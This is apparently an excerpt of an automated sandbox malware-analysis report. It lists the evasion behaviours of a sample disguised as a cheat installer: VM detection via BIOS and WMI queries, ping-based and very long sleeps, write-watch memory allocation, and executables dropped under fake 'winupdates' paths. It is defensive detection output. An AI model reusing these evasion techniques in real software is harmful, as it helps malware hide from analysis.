Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\SysWOW64\msiexec.exe

System information queried: FirmwareTableInformation

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Memory allocated: 11E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Memory allocated: 2F40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Memory allocated: 1560000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Memory allocated: 60A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Memory allocated: 70A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Memory allocated: 81D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Memory allocated: 91D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Memory allocated: 1B227BA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Memory allocated: 1B2414C0000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Window / User API: threadDelayed 2111
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2603
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7173
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2025
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7734

Found dropped PE file which has not been started or loaded

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIC26F.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIC30F.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi3348.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIC28.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\networkbroker.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI12E1.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI9F3.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIC2DF.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIF889.tmp	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\svchost.exe TID: 7044	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe TID: 5692	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe TID: 5968	Thread sleep count: 2111 > 30
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe TID: 5968	Thread sleep time: -52775s >= -30000s
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe TID: 408	Thread sleep count: 200 > 30
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe TID: 6956	Thread sleep count: 98 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4936	Thread sleep count: 2603 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4368	Thread sleep count: 7173 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1168	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6644	Thread sleep count: 2025 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4376	Thread sleep count: 7734 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2880	Thread sleep time: -1844674407370954s >= -30000s

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem

Sleep loop found (likely to delay execution)

Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe

Thread sleep count: Count: 2111 delay: -25

Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	File Volume queried: C:\Users\user\AppData\Roaming FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	File Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	File Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	File Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	File Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	File Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	File Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	File Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	File Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	File Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	File Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	File Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	File Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	File Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	File Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	File Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	File Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	File Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	File Volume queried: C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C FullSizeInformation
